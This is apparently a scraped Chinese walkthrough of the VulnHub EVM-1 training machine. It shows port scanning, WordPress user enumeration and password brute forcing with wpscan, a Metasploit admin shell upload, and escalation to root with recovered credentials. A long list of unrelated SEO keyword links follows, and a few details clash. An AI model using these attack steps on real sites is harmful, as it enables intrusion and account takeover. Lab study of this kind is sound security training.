Vulhub-EVM1靶机的使用方法
发表于:2024-09-24 作者:千家信息网编辑
千家信息网最后更新 2024年09月24日,一.环境搭建Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。地址h
千家信息网最后更新 2024年09月24日Vulhub-EVM1靶机的使用方法
一.环境搭建
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
地址
https://www.vulnhub.com/entry/evm-1,391/
下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)
ip为192.168.124.156
二.信息搜集:
(端口扫描)
nmap -A 192.168.124.56Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 ESTNmap scan report for localhost (192.168.124.56)Host is up (0.00035s latency).Not shown: 993 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)| dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works110/tcp open pop3?139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open imap Dovecot imapd|_imap-capabilities: CAPABILITY445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)MAC Address: 00:0C:29:C4:5F:AA (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: , NetBIOS MAC: (unknown)| smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)| Computer name: ubuntu-extermely-vulnerable-m4ch2ine| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00| Domain name: \x00| FQDN: ubuntu-extermely-vulnerable-m4ch2ine|_ System time: 2019-12-16T01:48:21-05:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: | 2.02: |_ Message signing enabled but not required| smb2-time: | date: 2019-12-16 01:48:21|_ start_date: N/A
(目录扫描)
开始使用dirb进行目录扫描dirb http://192.168.124.56/
从目录扫描看出他有wordpress所以先试试之前使用过的工具wpscan
wpscan --url http://192.168.124.56/wordpress/ -e u
成功得到账号c0rrupt3d_brain,现在继续破解他的密码
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt
成功破解出密码24992499
现在开始使用msfconsole 使用模块
unix/webapp/wp_admin_shell_uploadset RhOSTS 192.168.124.56set USERNAME c0rrupt3d_brainset PassWORD 24992499set targeturi /wordpressrun
直接进入他的家目录之后cd root3r 进来之后发现有一个文件似乎是root密码文件
现在进行查看发现似乎是密码,既然已经知道了密码所以接下来进入交互页面如下图:
shellpython -c "import pty;pty.spawn('/bin/bash')"su root
密码输入为:willy26
成功拿到root
密码
漏洞
目录
成功
文件
模式
网卡
镜像
靶场
安全
接下来
主机
信息
原理
命令
地址
工具
模块
环境
知识
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
芯片技术为什么是基于数据库
网络安全工程师学的人多吗
荒野行动pc连接上服务器打不开
光盘安装服务器系统
新媒体中心网络技术有什么作用
疫情后网络安全
深圳市必讯网络技术有限公司
支付宝充值服务器配置错误
衡阳快速软件开发报价
普洱平讯科技互联网设计
桓台染色软件开发价格
数据库能自动弹性伸缩吗
网络安全产业的前景
服务器转接矿池有什么用
数据库1040怎么解决
单选按钮数据库传值选中
8090模特数据库
数据库 乘
松江区品牌软件开发代理价格
数据库技术及应用自学考试
数据库两表查询和三表查询
app软件开发需要的技术
宝山区节能软件开发销售公司
智多星软件开发
dtu服务器
代理服务器号码
纪委涉密网络安全管理制度
深信服云计算网络安全面试
谭天网络安全
中国科技互联网文化旅游